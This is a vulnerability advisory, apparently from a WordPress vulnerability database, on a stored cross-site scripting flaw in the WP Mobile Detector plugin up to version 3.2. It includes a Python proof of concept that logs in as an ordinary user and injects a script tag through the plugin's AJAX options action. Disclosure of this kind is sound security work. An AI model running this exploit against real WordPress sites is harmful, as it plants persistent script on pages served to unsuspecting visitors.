WP Mobile Detector <= 3.2 - Stored Cross-Site Scripting (XSS)



Description
The WP Mobile Detector plugin exposes the AJAX action ‘websitez_options’ to all registered users on line 78 of wp-mobile-detector/websitez-wp-mobile-detector.php. Providing specially crafted form values will result in a Persistent  XSS attack on Mobile visitors.
Proof of Concept
import requests
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
        "log":"test",
        "pwd":"test",
        "wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
        "action":"websitez_options",
        "general[selected_mobile_theme]":"wz-mobile",
        "general[mobile_title]":"</title><script>alert(1)</script><title>" 
}
r = s.post(url, data=payload)

Affects Plugin

fixed in version 3.3

References

URL https://research.g0blin.co.uk/g0blin-00050/

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter James Hooker
Submitter Website https://research.g0blin.co.uk
Submitter Twitter g0blinResearch
Views 4361
Verified No
WPVDB ID 8059

Timeline

Publicly Published 2015-06-25 (over 4 years ago)
Added 2015-06-25 (over 4 years ago)
Last Updated 2019-10-21 (23 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin